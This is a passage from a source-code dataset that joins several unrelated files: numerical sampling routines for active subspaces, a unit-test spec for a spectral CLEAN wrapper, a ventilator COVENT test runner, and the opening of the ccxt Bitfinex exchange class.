:return: X, (M*N)-by-m matrix that contains points in the original
parameter space.
:rtype: ndarray
:return: ind, (M*N)-by-1 matrix that contains integer indices. These
indices identify which rows of `X` map to which rows of `Y`.
:rtype: ndarray
**Notes**
The inverse map depends critically on the `regularize_z` function.
"""
# check inputs
Y, NY, n = process_inputs(Y)
if not isinstance(N, int):
raise TypeError('N must be an int')
logging.getLogger(__name__).debug('Inverting {:d} y\'s with {:d} z\'s per y.'.format(NY, N))
Z = self.regularize_z(Y, N)
W = self.domain.subspaces.eigenvectors
X, ind = _rotate_x(Y, Z, W)
return X, ind
def regularize_z(self, Y, N):
"""
Find points in the space of inactive variables to complete the inverse
map.
:param ndarray Y: M-by-n matrix that contains points in the space of
active variables.
:param int N: The number of points in the original parameter space that
are returned that map to the given active variables.
:return: Z, (M)-by-(m-n)-by-N matrix that contains values of the
inactive variables.
:rtype: ndarray
**Notes**
The base class does not implement `regularize_z`. Specific
implementations depend on whether the original variables are bounded or
unbounded. They also depend on what the weight function is on the
original parameter space.
"""
raise NotImplementedError()
class BoundedActiveVariableMap(ActiveVariableMap):
"""
A class for the map between active/inactive and original variables when the
original variables are bounded by a hypercube with a uniform density.
**See Also**
domains.UnboundedActiveVariableMap
"""
def regularize_z(self, Y, N):
"""
Find points in the space of inactive variables to complete the inverse
map.
:param ndarray Y: M-by-n matrix that contains points in the space of
active variables.
:param int N: The number of points in the original parameter space that
are returned that map to the given active variables.
:return: Z, (M)-by-(m-n)-by-N that contains values of the inactive
variables.
:rtype: ndarray
**Notes**
This implementation of `regularize_z` uses the function `sample_z` to
randomly sample values of the inactive variables to complement the
given values of the active variables.
"""
W1, W2 = self.domain.subspaces.W1, self.domain.subspaces.W2
m, n = W1.shape
# sample the z's
# TODO: preallocate and organize properly
NY = Y.shape[0]
Zlist = []
for y in Y:
Zlist.append(sample_z(N, y, W1, W2))
#Z = np.array(Zlist).reshape((NY, m-n, N))
Z = np.swapaxes(np.array(Zlist),1,2)
return Z
class UnboundedActiveVariableMap(ActiveVariableMap):
"""
A class for the map between active/inactive and original variables when the
original variables are ubbounded and the space is equipped with a standard
Gaussian density.
**See Also**
domains.BoundedActiveVariableMap
"""
def regularize_z(self, Y, N):
"""
Find points in the space of inactive variables to complete the inverse
map.
:param ndarray Y: M-by-n matrix that contains points in the space of
active variables.
:param int N: The number of points in the original parameter space that
are returned that map to the given active variables.
:return: Z, (M)-by-(m-n)-by-N matrix that contains values of the
inactive variables.
:rtype: ndarray
**Notes**
This implementation of `regularize_z` samples the inactive variables
from a standard (m-n)-variate Gaussian distribution.
"""
m, n = self.domain.subspaces.W1.shape
# sample z's
NY = Y.shape[0]
Z = np.random.normal(size=(NY, m-n, N))
return Z
def nzv(m, n):
"""
Compute the number of zonotope vertices for a linear map from R^m to R^n.
:param int m: The dimension of the hypercube.
:param int n: The dimension of the low-dimesional subspace.
:return: k, The number of vertices defining the zonotope.
:rtype: int
:return: M, used as a temporary variable for the recursive computation. It
can be discarded.
:rtype: ndarray
"""
if not isinstance(m, int):
raise TypeError('m should be an integer.')
if not isinstance(n, int):
raise TypeError('n should be an integer.')
# number of zonotope vertices
N = 0
for i in range(n):
N = N + comb(m-1,i)
N = 2*N
return int(N)
def interval_endpoints(W1):
"""
Compute the range of a 1d active variable.
:param ndarray W1: m-by-1 matrix that contains the eigenvector that
defines the first active variable.
:rerutn: Y, 2-by-1 matrix that contains the endpoints of the interval
defining the range of the 1d active variable.
:rtype: ndarray
:return: X, 2-by-m matrix that contains the corners of the m-dimensional
hypercube that map to the active variable endpoints.
:rtype: ndarray
"""
logging.getLogger(__name__).debug('Interval domain.')
m = W1.shape[0]
y0 = np.dot(W1.T, np.sign(W1))[0]
if y0 < -y0:
yl, yu = y0, -y0
xl, xu = np.sign(W1), -np.sign(W1)
else:
yl, yu = -y0, y0
xl, xu = -np.sign(W1), np.sign(W1)
Y = np.array([yl, yu]).reshape((2,1))
X = np.vstack((xl.reshape((1, m)), xu.reshape((1, m))))
return Y, X
def unique_rows(S):
"""
Return the unique rows from S.
http://stackoverflow.com/questions/16970982/find-unique-rows-in-numpy-array
"""
T = S.view(np.dtype((np.void, S.dtype.itemsize * S.shape[1])))
return np.unique(T).view(S.dtype).reshape(-1, S.shape[1])
def zonotope_vertices(W1, Nsamples=1e4, maxcount=1e5):
"""
Compute the vertices of the zonotope.
:param ndarray W1: m-by-n matrix that contains the eigenvector bases of the
n-dimensional active subspace.
:return: Y, nzv-by-n matrix that contains the zonotope vertices.
:rtype: ndarray
:return: X, nzv-by-m matrix that contains the corners of the m-dimensional
hypercube that map to the zonotope vertices.
:rtype: ndarray
"""
m, n = W1.shape
totalverts = nzv(m,n)
logging.getLogger(__name__).debug('Zonotope domain in {:d} dims with {:d} vertices.'.format(n, totalverts))
# initialize
Z = np.random.normal(size=(Nsamples, n))
X = unique_rows(np.sign(np.dot(Z, W1.transpose())))
X = unique_rows(np.vstack((X, -X)))
N = X.shape[0]
count = 0
while N < totalverts:
Z = np.random.normal(size=(Nsamples, n))
X0 = unique_rows(np.sign(np.dot(Z, W1.transpose())))
X0 = unique_rows(np.vstack((X0, -X0)))
X = unique_rows(np.vstack((X, X0)))
N = X.shape[0]
count += 1
if count > maxcount:
break
numverts = X.shape[0]
if totalverts > numverts:
print 'Warning: {} of {} vertices found.'.format(numverts, totalverts)
Y = np.dot(X, W1)
return Y.reshape((numverts, n)), X.reshape((numverts, m))
def sample_z(N, y, W1, W2):
"""
Sample values of the inactive variables for a fixed value of the active
variables when the original variables are bounded by a hypercube.
:param int N: The number of inactive variable samples.
:param ndarray y: The value of the active variables.
:param ndarray W1: m-by-n matrix that contains the eigenvector bases of the
n-dimensional active subspace.
:param ndarray W2: m-by-(m-n) matrix that contains the eigenvector bases of
the (m-n)-dimensional inactive subspace.
:return: Z, N-by-(m-n) matrix that contains values of the active variable
that correspond to the given `y`.
:rtype: ndarray
**Notes**
The trick here is to sample the inactive variables z so that
-1 <= W1*y + W2*z <= 1,
where y is the given value of the active variables. In other words, we need
to sample z such that it respects the linear equalities
W2*z <= 1 - W1*y, -W2*z <= 1 + W1*y.
These inequalities define a polytope in R^(m-n). We want to sample `N`
points uniformly from the polytope.
This function first tries a simple rejection sampling scheme, which (i)
finds a bounding hyperbox for the polytope, (ii) draws points uniformly from
the bounding hyperbox, and (iii) rejects points outside the polytope.
If that method does not return enough samples, the method tries a "hit and
run" method for sampling from the polytope.
If that doesn't work, it returns an array with `N` copies of a feasible
point computed as the Chebyshev center of the polytope. Thanks to David
Gleich for showing me Chebyshev centers.
"""
if not isinstance(N, int):
raise TypeError('N should be an integer.')
Z = rejection_sampling_z(N, y, W1, W2)
if Z is None:
logging.getLogger(__name__).warn('Rejection sampling has failed miserably. Will try hit and run sampling.')
Z = hit_and_run_z(N, y, W1, W2)
return Z
def hit_and_run_z(N, y, W1, W2):
"""
A hit and run method for sampling the inactive variables from a polytope.
**See Also**
domains.sample_z
"""
m, n = W1.shape
# get an initial feasible point using the Chebyshev center. huge props to
# David Gleich for showing me the Chebyshev center.
s = np.dot(W1, y).reshape((m, 1))
normW2 = np.sqrt( np.sum( np.power(W2, 2), axis=1 ) ).reshape((m,1))
A = np.hstack(( np.vstack((W2, -W2.copy())), np.vstack((normW2, normW2.copy())) ))
b = np.vstack((1-s, 1+s)).reshape((2*m, 1))
c = np.zeros((m-n+1,1))
c[-1] = -1.0
qps = QPSolver()
zc = qps.linear_program_ineq(c, -A, -b)
z0 = zc[:-1].reshape((m-n, 1))
# define the polytope A >= b
s = np.dot(W1, y).reshape((m, 1))
A = np.vstack((W2, -W2))
b = np.vstack((-1-s, -1+s)).reshape((2*m, 1))
# tolerance
ztol = 1e-6
eps0 = ztol/4.0
Z = np.zeros((N, m-n))
for i in range(N):
# random direction
bad_dir = True
count, maxcount = 0, 50
while bad_dir:
d = np.random.normal(size=(m-n,1))
bad_dir = np.any(np.dot(A, z0 + eps0*d) <= b)
count += 1
if count >= maxcount:
logging.getLogger(__name__).warn('There are no more directions worth pursuing in hit and run. Got {:d} samples.'.format(i))
Z[i:,:] = np.tile(z0, (1,N-i)).transpose()
return Z
# find constraints that impose lower and upper bounds on eps
f, g = b - np.dot(A,z0), np.dot(A, d)
# find an upper bound on the step
min_ind = np.logical_and(g<=0, f < -np.sqrt(np.finfo(np.float).eps))
eps_max = np.amin(f[min_ind]/g[min_ind])
# find a lower bound on the step
max_ind = np.logical_and(g>0, f < -np.sqrt(np.finfo(np.float).eps))
eps_min = np.amax(f[max_ind]/g[max_ind])
# randomly sample eps
eps1 = np.random.uniform(eps_min, eps_max)
# take a step along d
z1 = z0 + eps1*d
Z[i,:] = z1.reshape((m-n, ))
# update temp var
z0 = z1.copy()
return Z
def rejection_sampling_z(N, y, W1, W2):
"""
A rejection sampling method for sampling the inactive variables from a
polytope.
**See Also**
domains.sample_z
"""
m, n = W1.shape
s = np.dot(W1, y).reshape((m, 1))
# Build a box around z for uniform sampling
qps = QPSolver()
A = np.vstack((W2, -W2))
b = np.vstack((-1-s, -1+s)).reshape((2*m, 1))
lbox, ubox = np.zeros((1,m-n)), np.zeros((1,m-n))
for i in range(m-n):
clb = np.zeros((m-n,1))
clb[i,0] = 1.0
lbox[0,i] = qps.linear_program_ineq(clb, A, b)[i,0]
cub = np.zeros((m-n,1))
cub[i,0] = -1.0
ubox[0,i] = qps.linear_program_ineq(cub, A, b)[i,0]
bn = BoundedNormalizer(lbox, ubox)
Zbox = bn.unnormalize(np.random.uniform(-1.0,1.0,size=(50*N,m-n)))
ind = np.all(np.dot(A, Zbox.T) >= b, axis=0)
if np.sum(ind) >= N:
Z = Zbox[ind,:]
return Z[:N,:].reshape((N,m-n))
else:
return None
def random_walk_z(N, y, W1, W2):
"""
A random walk method for sampling the inactive variables from a polytope.
**See Also**
domains.sample_z
"""
m, n = W1.shape
s = np.dot(W1, y).reshape((m, 1))
# linear program to get starting z0
if np.all(np.zeros((m, 1)) <= 1-s) and np.all(np.zeros((m, 1)) >= -1-s):
z0 = np.zeros((m-n, 1))
else:
qps = QPSolver()
lb = -np.ones((m,1))
ub = np.ones((m,1))
c = np.zeros((m,1))
x0 = qps.linear_program_eq(c, W1.T, y.reshape((n,1)), lb, ub)
z0 = np.dot(W2.T, x0).reshape((m-n, 1))
# get MCMC step size
sig = 0.1*np.minimum(
np.linalg.norm(np.dot(W2, z0) + s - 1),
np.linalg.norm(np.dot(W2, z0) + s + 1))
# burn in
for i in range(10*N):
zc = z0 + sig*np.random.normal(size=z0.shape)
if np.all(np.dot(W2, zc) <= 1-s) and np.all(np.dot(W2, zc) >= -1-s):
z0 = zc
# sample
Z = np.zeros((m-n, N))
for i in range(N):
zc = z0 + sig*np.random.normal(size=z0.shape)
if np.all(np.dot(W2, zc) <= 1-s) and np.all(np.dot(W2, zc) >= -1-s):
z0 = zc
Z[:,i] = z0.reshape((z0.shape[0], ))
return Z.reshape((N, m-n))
def _rotate_x(Y, Z, W):
NY, n = Y.shape
N = Z.shape[2]
m = n + Z.shape[1]
YY = np.tile(Y.reshape((NY, n, 1)), (1, 1, N))
YZ = np.concatenate((YY, Z), axis=1).transpose((1, 0, 2)).reshape((m, N*NY)).transpose((1, 0))
X = np.dot(YZ, W.T).reshape((N*NY,m))
ind = np.kron(np.arange(NY), np.ones(N)).reshape((N*NY,1))
return X, ind
| 32.802908 | 139 | 0.611918 |
6d76e5ff0e17889908d0167a4c701c5a35efa948 | 5,798 | py | Python | spec/clean/wrapper_spec.py | slavad/py-series-clean | 2a7cbd0cec1a46374e49eae79e6a88afb31ca54a | [
"MIT"
] | null | null | null | spec/clean/wrapper_spec.py | slavad/py-series-clean | 2a7cbd0cec1a46374e49eae79e6a88afb31ca54a | [
"MIT"
] | null | null | null | spec/clean/wrapper_spec.py | slavad/py-series-clean | 2a7cbd0cec1a46374e49eae79e6a88afb31ca54a | [
"MIT"
] | null | null | null | from spec.spec_helper import *
import clean.wrapper as wrp
with description(wrp.Wrapper) as self:
with before.all:
self.use_aver = False
self.round_precision = 10
self.khi = 4
self.detection_treshold = 0.3
self.harmonic_share = 0.5
self.max_iterations = 10
self.time_grid = np.load("./spec/fixtures/unit/time_grid_1.pickle")
self.values = np.load("./spec/fixtures/unit/series_1.pickle")
self.distance_vector = np.load("./spec/fixtures/unit/distance_vector_1.pickle")
with before.each:
self.wrapper = wrp.Wrapper(self.time_grid, self.values)
with description('__init__'):
with it('sets correct values'):
expect(self.wrapper._Wrapper__time_grid).to(equal_ndarray(self.time_grid))
expect(self.wrapper._Wrapper__values).to(equal_ndarray(self.values))
expect(self.wrapper._Wrapper__distance_vector).to(equal_ndarray(self.distance_vector))
with shared_context('#__estimate_max_freq checker'):
with description('#__estimate_max_freq'):
with before.all:
self.time_grid = np.array(
[0.0, 5.0, 6.0, 9.0, 20.0]
).reshape((-1, 1))
with it('returns max freq estimated by minimum time distance'):
expect(self.wrapper._Wrapper__estimate_max_freq(self.use_aver)).to(
equal(self.expected_max_freq)
)
with description('use_aver is False'):
with before.all:
self.use_aver = False
self.expected_max_freq = 0.5
with included_context('#__estimate_max_freq checker'):
pass
with description('use_aver is True'):
with before.all:
self.use_aver = True
self.expected_max_freq = 0.1
with included_context('#__estimate_max_freq checker'):
pass
with description('#__calculate_estimations_vector_size'):
with before.all:
self.use_aver = False
self.time_grid = np.array([0.0, 3.5]).reshape((-1, 1))
with it('calculates correct value'):
max_freq = 0.8
khi = 4
expected_num_of_freq_estimations = 12
expect(self.wrapper._Wrapper__calculate_estimations_vector_size(max_freq, khi)).to(
equal(expected_num_of_freq_estimations)
)
with description('clean'):
with before.all:
self.expected_keys = [
'iterations', 'freq_vector', 'uniform_time_grid',
'clean_spectrum', 'correlogram', 'uniform_series',
'frequencies', 'amplitudes', 'phases'
]
self.expected_keys_arr = [
'freq_vector', 'uniform_time_grid',
'clean_spectrum', 'correlogram', 'uniform_series',
'frequencies', 'amplitudes', 'phases'
]
with before.each:
self.result = self.wrapper.clean(
self.detection_treshold, self.max_iterations, self.harmonic_share, self.khi, self.use_aver
)
with shared_context('iteratoins result checker'):
with it('returns dict with correct keys'):
expect(self.result).to(have_only_keys(*self.expected_keys))
with it('returns correct number of iterations'):
expect(self.result['iterations']).to(equal(self.expected_iterations))
with it('returns correct values and does not contain zeroes'):
for key in self.expected_keys_arr:
expect(
self.result[key]
).to(contain_non_zero_vals(self.round_precision))
expect(
self.result[key]
).to(equal_ndarray(getattr(self, key), self.round_precision))
with description('use_aver is False'):
with before.all:
self.use_aver = False
self.expected_iterations = 4
self.uniform_time_grid = np.load("./spec/fixtures/unit/uniform_time_grid_1.pickle")
self.freq_vector = np.load("./spec/fixtures/unit/freq_vector_1.pickle")
self.clean_spectrum = np.load("./spec/fixtures/unit/clean_spectrum_1.pickle")
self.correlogram = np.load("./spec/fixtures/unit/correlogram_1.pickle")
self.uniform_series = np.load("./spec/fixtures/unit/uniform_series_1.pickle")
self.frequencies = np.load("./spec/fixtures/unit/frequencies_1.pickle")
self.amplitudes = np.load("./spec/fixtures/unit/amplitudes_1.pickle")
self.phases = np.load("./spec/fixtures/unit/phases_1.pickle")
with included_context('iteratoins result checker'):
pass
with description('use_aver is True'):
with before.all:
self.use_aver = True
self.expected_iterations = 4
self.uniform_time_grid = np.load("./spec/fixtures/unit/uniform_time_grid_2.pickle")
self.freq_vector = np.load("./spec/fixtures/unit/freq_vector_2.pickle")
self.clean_spectrum = np.load("./spec/fixtures/unit/clean_spectrum_2.pickle")
self.correlogram = np.load("./spec/fixtures/unit/correlogram_2.pickle")
self.uniform_series = np.load("./spec/fixtures/unit/uniform_series_2.pickle")
self.frequencies = np.load("./spec/fixtures/unit/frequencies_2.pickle")
self.amplitudes = np.load("./spec/fixtures/unit/amplitudes_2.pickle")
self.phases = np.load("./spec/fixtures/unit/phases_2.pickle")
with included_context('iteratoins result checker'):
pass
| 44.945736 | 106 | 0.600552 |
82de6fe2d00868a8647723b5969818dda0271144 | 6,235 | py | Python | software/utils/run_covent_tests.py | dheater/Ventilator | f10c03805f8907683ee91e1da0fd82088b028563 | [
"Apache-2.0"
] | null | null | null | software/utils/run_covent_tests.py | dheater/Ventilator | f10c03805f8907683ee91e1da0fd82088b028563 | [
"Apache-2.0"
] | null | null | null | software/utils/run_covent_tests.py | dheater/Ventilator | f10c03805f8907683ee91e1da0fd82088b028563 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
"""
Wrapper around controller_debug.py that runs all of the covent tests in a row
and packages them into a standard, sharable format.
"""
from datetime import date
from pathlib import Path
import argparse
import atexit
import math
import os
import subprocess
import time
import sys
import shlex
PRESETS = [f"covent_pc_{i}" for i in range(1, 9)]
# Covent tests come in two flavors, ones which are meant to run at 30%
# fio2, and ones which are meant to run at 90%.
HIGH_OX_TESTS = {f"covent_pc_{i}" for i in [2, 3, 6, 7]}
DBG_SCRIPT = Path(__file__).absolute().parent.joinpath("controller_debug.py")
def run_test(test, cmd_args):
def run(args):
subprocess.check_call(
[sys.executable, DBG_SCRIPT, "--port", cmd_args.port, "-c", args]
)
outfile = cmd_args.dest.joinpath(f"{test}.dat")
# Tell the controller whether to generate pressure using the fan or the
# high-pressure oxygen source.
#
# TODO: Although these tests are meant to run at 30%/90% fio2, we currently
# can't mix air and oxygen, so we run them at 21% and 100%.
if cmd_args.oxygen == "on" or (cmd_args.oxygen == "auto" and test in HIGH_OX_TESTS):
run("set gui_fio2 100")
else:
run("set gui_fio2 21")
# Ensure the ventilator fan is on, and disconnect the fan from the system
# so it's not inflating the test lung. Edwin's request is that the fan
# doesn't have to spin up during these tests.
run("set forced_exhale_valve_pos 1")
run("set forced_blower_valve_pos 0")
run("set forced_blower_power 1")
run("set gui_mode 0")
# Switch to this preset.
run(f"preset {test}")
# Give the user a chance to adjust the test lung.
if not cmd_args.nointeractive:
input(
"Adjust test lung per above, then press enter. "
"(Skip this with --nointeractive.)"
)
# Unforce parameters we set above so they can be controlled by the
# controller. Note that we unforce the blower power *after* setting the
# gui_mode to 1 because if we unforced it while we were still in mode 0
# (i.e. "ventilator off"), the fan would momentarily spin down.
run("set forced_exhale_valve_pos -1")
run("set forced_blower_valve_pos -1")
run("set gui_mode 1")
run("set forced_blower_power -1")
time.sleep(cmd_args.ignore_secs)
run(f"trace start pc_setpoint pressure volume net_flow")
time.sleep(cmd_args.capture_secs)
# Graphing flow at any scale is noisy and overwhelms the rest of the chart.
# trace graph can't currently exclude fields, so as a hack, graph flow
# divided by a large number, essentially zeroing it out.
run(
f"trace graph --dest={shlex.quote(str(outfile))} --title={test} "
"--nointeractive --scale=volume/10 --scale=net_flow/1e9"
)
def concat_images(cmd_args):
# It's more compact to show two images per row, but then visually you are
# tempted to assume the Y axes are the same in each row, which is not true.
IMAGES_PER_ROW = 1
try:
from PIL import Image
except ImportError:
print("pip install pillow to get a single image of all the test results.")
return
images = [Image.open(p) for p in sorted(cmd_args.dest.glob("*.png"))]
max_width = max(img.width for img in images)
max_height = max(img.height for img in images)
combined_width = min(IMAGES_PER_ROW, len(images)) * max_width
combined_height = math.ceil(len(images) / IMAGES_PER_ROW) * max_height
combined = Image.new(
"RGB", (combined_width, combined_height), color=(255, 255, 255)
)
for i, img in enumerate(images):
xidx = i % IMAGES_PER_ROW
yidx = i // IMAGES_PER_ROW
combined.paste(img, (xidx * max_width, yidx * max_height))
combined.save(cmd_args.dest.joinpath("combined.png"))
def choose_dest_dir():
prefix = f"covent-tests-{date.today().isoformat()}-run-"
dirs = sorted(Path(".").glob(prefix + "[0-9][0-9][0-9]"))
if not dirs:
n = 0
else:
n = int(str(dirs[-1])[-3:]) + 1
return f"{prefix}{n:03d}"
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--port",
help="port device is connected to (default: try to auto-detect the port)",
)
parser.add_argument(
"--tests",
help="comma-separated list of test numbers to run "
"(default: run all covent tests)",
)
parser.add_argument(
"--oxygen",
choices=["off", "auto", "on"],
default="off",
help="Deliver air from the blower (off), from the pressurized oxygen "
"source (on), or according to the particular test (auto).",
)
parser.add_argument(
"--ignore-secs",
help="Ignore this many seconds of data before starting to capture.",
default=10,
type=int,
)
parser.add_argument(
"--capture-secs",
help="Capture this many seconds of data from each test.",
default=20,
type=int,
)
parser.add_argument("--dest", help="Output directory (must not exist)")
parser.add_argument(
"--nointeractive",
help="Run without prompting the user to e.g. change lung compliance",
)
args = parser.parse_args()
if not args.port:
args.port = (
subprocess.check_output(
[sys.executable, DBG_SCRIPT, "--detect-port-and-quit"]
)
.decode("utf-8")
.strip()
)
if not args.dest:
args.dest = choose_dest_dir()
print(f"Writing output to {args.dest}")
args.dest = Path(args.dest)
if args.tests:
tests = [f"covent_pc_{i}" for i in args.tests.split(",")]
else:
tests = PRESETS
# Stop ventilating if this script exits abnormally, e.g. due to ctrl+c.
def stop_ventilation():
subprocess.check_call(
[sys.executable, DBG_SCRIPT, "--port", args.port, "-c", "set gui_mode 0"]
)
atexit.register(stop_ventilation)
args.dest.mkdir(exist_ok=False)
for i, t in enumerate(tests):
run_test(t, args)
concat_images(args)
if __name__ == "__main__":
main()
| 31.489899 | 88 | 0.636568 |
d1407978d93c3aa875c8f532333b9189b1020197 | 48,603 | py | Python | python/ccxt/bitfinex.py | machenjie/ccxt | fb18393cdf893dba62eab7838040fb9cec7f10fd | [
"MIT"
] | 1 | 2021-07-07T14:56:56.000Z | 2021-07-07T14:56:56.000Z | python/ccxt/bitfinex.py | machenjie/ccxt | fb18393cdf893dba62eab7838040fb9cec7f10fd | [
"MIT"
] | 1 | 2022-03-05T13:29:47.000Z | 2022-03-05T15:00:38.000Z | python/ccxt/bitfinex.py | machenjie/ccxt | fb18393cdf893dba62eab7838040fb9cec7f10fd | [
"MIT"
] | 1 | 2021-11-30T11:30:35.000Z | 2021-11-30T11:30:35.000Z | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import hashlib
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import NotSupported
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import InvalidNonce
from ccxt.base.decimal_to_precision import ROUND
from ccxt.base.decimal_to_precision import TRUNCATE
from ccxt.base.decimal_to_precision import DECIMAL_PLACES
from ccxt.base.decimal_to_precision import SIGNIFICANT_DIGITS
class bitfinex(Exchange):
def describe(self):
return self.deep_extend(super(bitfinex, self).describe(), {
'id': 'bitfinex',
'name': 'Bitfinex',
'countries': ['VG'],
'version': 'v1',
'rateLimit': 1500,
'certified': True,
'pro': True,
# new metainfo interface
'has': {
'cancelAllOrders': True,
'cancelOrder': True,
'CORS': False,
'createDepositAddress': True,
'createOrder': True,
'deposit': True,
'editOrder': True,
'fetchBalance': True,
'fetchClosedOrders': True,
'fetchDepositAddress': True,
'fetchDeposits': False,
'fetchFundingFees': True,
'fetchMarkets': True,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTrades': True,
'fetchTradingFee': True,
'fetchTradingFees': True,
'fetchTransactions': True,
'fetchWithdrawals': False,
'withdraw': True,
},
'timeframes': {
'1m': '1m',
'5m': '5m',
'15m': '15m',
'30m': '30m',
'1h': '1h',
'3h': '3h',
'4h': '4h',
'6h': '6h',
'12h': '12h',
'1d': '1D',
'1w': '7D',
'2w': '14D',
'1M': '1M',
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/27766244-e328a50c-5ed2-11e7-947b-041416579bb3.jpg',
'api': {
'v2': 'https://api-pub.bitfinex.com', # https://github.com/ccxt/ccxt/issues/5109
'public': 'https://api.bitfinex.com',
'private': 'https://api.bitfinex.com',
},
'www': 'https://www.bitfinex.com',
'referral': 'https://www.bitfinex.com/?refcode=P61eYxFL',
'doc': [
'https://docs.bitfinex.com/v1/docs',
'https://github.com/bitfinexcom/bitfinex-api-node',
],
},
'api': {
# v2 symbol ids require a 't' prefix
# just the public part of it(use bitfinex2 for everything else)
'v2': {
'get': [
'platform/status',
'tickers',
'ticker/{symbol}',
'trades/{symbol}/hist',
'book/{symbol}/{precision}',
'book/{symbol}/P0',
'book/{symbol}/P1',
'book/{symbol}/P2',
'book/{symbol}/P3',
'book/{symbol}/R0',
'stats1/{key}:{size}:{symbol}:{side}/{section}',
'stats1/{key}:{size}:{symbol}/{section}',
'stats1/{key}:{size}:{symbol}:long/last',
'stats1/{key}:{size}:{symbol}:long/hist',
'stats1/{key}:{size}:{symbol}:short/last',
'stats1/{key}:{size}:{symbol}:short/hist',
'candles/trade:{timeframe}:{symbol}/{section}',
'candles/trade:{timeframe}:{symbol}/last',
'candles/trade:{timeframe}:{symbol}/hist',
],
},
'public': {
'get': [
'book/{symbol}',
# 'candles/{symbol}',
'lendbook/{currency}',
'lends/{currency}',
'pubticker/{symbol}',
'stats/{symbol}',
'symbols',
'symbols_details',
'tickers',
'trades/{symbol}',
],
},
'private': {
'post': [
'account_fees',
'account_infos',
'balances',
'basket_manage',
'credits',
'deposit/new',
'funding/close',
'history',
'history/movements',
'key_info',
'margin_infos',
'mytrades',
'mytrades_funding',
'offer/cancel',
'offer/new',
'offer/status',
'offers',
'offers/hist',
'order/cancel',
'order/cancel/all',
'order/cancel/multi',
'order/cancel/replace',
'order/new',
'order/new/multi',
'order/status',
'orders',
'orders/hist',
'position/claim',
'position/close',
'positions',
'summary',
'taken_funds',
'total_taken_funds',
'transfer',
'unused_taken_funds',
'withdraw',
],
},
},
'fees': {
'trading': {
'tierBased': True,
'percentage': True,
'maker': 0.1 / 100,
'taker': 0.2 / 100,
'tiers': {
'taker': [
[0, 0.2 / 100],
[500000, 0.2 / 100],
[1000000, 0.2 / 100],
[2500000, 0.2 / 100],
[5000000, 0.2 / 100],
[7500000, 0.2 / 100],
[10000000, 0.18 / 100],
[15000000, 0.16 / 100],
[20000000, 0.14 / 100],
[25000000, 0.12 / 100],
[30000000, 0.1 / 100],
],
'maker': [
[0, 0.1 / 100],
[500000, 0.08 / 100],
[1000000, 0.06 / 100],
[2500000, 0.04 / 100],
[5000000, 0.02 / 100],
[7500000, 0],
[10000000, 0],
[15000000, 0],
[20000000, 0],
[25000000, 0],
[30000000, 0],
],
},
},
'funding': {
'tierBased': False, # True for tier-based/progressive
'percentage': False, # fixed commission
# Actually deposit fees are free for larger deposits(> $1000 USD equivalent)
# these values below are deprecated, we should not hardcode fees and limits anymore
# to be reimplemented with bitfinex funding fees from their API or web endpoints
'deposit': {
'BTC': 0.0004,
'IOTA': 0.5,
'ETH': 0.0027,
'BCH': 0.0001,
'LTC': 0.001,
'EOS': 0.24279,
'XMR': 0.04,
'SAN': 0.99269,
'DASH': 0.01,
'ETC': 0.01,
'XRP': 0.02,
'YYW': 16.915,
'NEO': 0,
'ZEC': 0.001,
'BTG': 0,
'OMG': 0.14026,
'DATA': 20.773,
'QASH': 1.9858,
'ETP': 0.01,
'QTUM': 0.01,
'EDO': 0.95001,
'AVT': 1.3045,
'USDT': 0,
'TRX': 28.184,
'ZRX': 1.9947,
'RCN': 10.793,
'TNB': 31.915,
'SNT': 14.976,
'RLC': 1.414,
'GNT': 5.8952,
'SPK': 10.893,
'REP': 0.041168,
'BAT': 6.1546,
'ELF': 1.8753,
'FUN': 32.336,
'SNG': 18.622,
'AID': 8.08,
'MNA': 16.617,
'NEC': 1.6504,
'XTZ': 0.2,
},
'withdraw': {
'BTC': 0.0004,
'IOTA': 0.5,
'ETH': 0.0027,
'BCH': 0.0001,
'LTC': 0.001,
'EOS': 0.24279,
'XMR': 0.04,
'SAN': 0.99269,
'DASH': 0.01,
'ETC': 0.01,
'XRP': 0.02,
'YYW': 16.915,
'NEO': 0,
'ZEC': 0.001,
'BTG': 0,
'OMG': 0.14026,
'DATA': 20.773,
'QASH': 1.9858,
'ETP': 0.01,
'QTUM': 0.01,
'EDO': 0.95001,
'AVT': 1.3045,
'USDT': 20,
'TRX': 28.184,
'ZRX': 1.9947,
'RCN': 10.793,
'TNB': 31.915,
'SNT': 14.976,
'RLC': 1.414,
'GNT': 5.8952,
'SPK': 10.893,
'REP': 0.041168,
'BAT': 6.1546,
'ELF': 1.8753,
'FUN': 32.336,
'SNG': 18.622,
'AID': 8.08,
'MNA': 16.617,
'NEC': 1.6504,
'XTZ': 0.2,
},
},
},
# todo rewrite for https://api-pub.bitfinex.com//v2/conf/pub:map:tx:method
'commonCurrencies': {
'ABS': 'ABYSS',
'AIO': 'AION',
'ALG': 'ALGO', # https://github.com/ccxt/ccxt/issues/6034
'AMP': 'AMPL',
'ATM': 'ATMI',
'ATO': 'ATOM', # https://github.com/ccxt/ccxt/issues/5118
'BAB': 'BCH',
'CTX': 'CTXC',
'DAD': 'DADI',
'DAT': 'DATA',
'DSH': 'DASH',
'DRK': 'DRK',
# https://github.com/ccxt/ccxt/issues/7399
# https://coinmarketcap.com/currencies/pnetwork/
# https://en.cryptonomist.ch/blog/eidoo/the-edo-to-pnt-upgrade-what-you-need-to-know-updated/
'EDO': 'PNT',
'GSD': 'GUSD',
'HOT': 'Hydro Protocol',
'IOS': 'IOST',
'IOT': 'IOTA',
'IQX': 'IQ',
'MIT': 'MITH',
'MNA': 'MANA',
'NCA': 'NCASH',
